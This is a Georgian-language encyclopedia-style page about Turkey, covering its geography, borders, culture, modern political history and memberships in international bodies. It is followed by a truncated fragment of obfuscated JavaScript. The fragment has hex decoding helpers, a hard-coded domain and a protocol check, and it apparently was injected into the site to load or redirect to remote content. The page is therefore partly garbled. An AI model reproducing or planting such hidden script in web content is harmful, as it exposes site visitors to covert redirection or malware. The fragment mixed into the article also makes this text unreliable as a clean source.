თურქეთი

თურქეთი (თურქ. Türkiye; ოფიციალურად თურქეთის რესპუბლიკა — Türkiye Cumhuriyeti) — ქვეყანა ევრაზიაში, რომელიცანატოლიის ნახევარკუნძულზე მდებარეობს დასავლეთ აზიაში და თრაკეზე (რუმელია) სამხრეთ-აღმოსავლეთ ევროპისბალკანეთის რეგიონში. თურქეთს ესაზღვრება რვა ქვეყანა: ბულგარეთი, საბერძნეთი, საქართველო, სომხეთი, აზერბაიჯანი(ნახიჩევანი), ირანი, ერაყი და სირია. სამხრეთით თურქეთს ესაზღვრება ხმელთაშუა ზღვა, დასავლეთით ეგეოსის ზღვა, ხოლო ჩრდილოეთით შავი ზღვა. ანატოლიას თრაკესგან აშორებს მარმარილოს ზღვა და თურქეთის სრუტეები (ბოსფორი დადარდანელი), რომლებსაც აზიასა და ევროპას შორის საზღვრად მიიჩნევენ, რის გამოც თურქეთი ტრანსკონტინენტური ქვეყანაა.

ორ კონტინენტზე სტრატეგიული მდებარეობის გამო თურქეთის კულტურა აღმოსავლეთისა და დასავლეთის ტრადიციათა უნიკალური ნაზავია. ძლიერი ისტორიული, კულტურული და ეკონომიკური გავლენით რეგიონში ევროპას, ცენტრალურ აზიას, რუსეთსა და ახლო აღმოსავლეთს შორის, თურქეთმა ბოლო საუკუნეებში სტრატეგიული მნიშვნელობა შეიძინა.

თურქეთი დემოკრატიული, სეკულარული, უნიტარული, კონსტიტუციური რესპუბლიკაა. მისი თანამედროვე პოლიტიკური სისტემა 1923 წელს ჩამოყალიბდა მუსტაფა ქემალ ათათურქის მეთაურობით, რომელიც მთავრობაში პირველი მსოფლიო ომისბოლოს ოსმალეთის იმპერიის დაცემის შემდეგ მოვიდა. მას შემდეგ თურქეთი სულ უფრო მჭიდროდ ხდება ინტეგრირებული დასავლეთთან ევროპის საბჭოში, ნატო-ში, OECD, OSCE და G-20-ში გაწევრიანებით. თურქეთმა ევროკავშირში სრულუფლებიან წევრობაზე მოლაპარაკება 2005 წელს დაიწყო, იყო რა ევროპის ეკონომიკური საბჭოს ასოცირებული წევრი 1963 წლიდან და საბაჟოს კავშირის წევრი 1995 წლიდან. ამასთან ერთად, როგორც მეტწილად მაჰმადიანური ქვეყანა, თურქეთი აგრძელებს ახლო კულტურულ, პოლიტიკურ, ეკონომიკურ და ინდუსტრიულ ურთიერთობებს აღმოსავლეთის ქვეყნებთან, განსაკუთრებით ახლო აღმოსავლეთსა და ცენტრალურ აზიასთან, ისეთ ორგანიზაციებში წევრობით, როგორიცაა OIC და ECO. აშშ-ის ცენტრალური სადაზვერვო სააგენტოს კლასიფიკაციით თურქეთი განვითარებული ქვეყანაა, ხოლო პოლიტიკური მეცნიერებისა და ეკონომისტების შეფასებით ის რეგიონული ზესახელმწიფოა.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply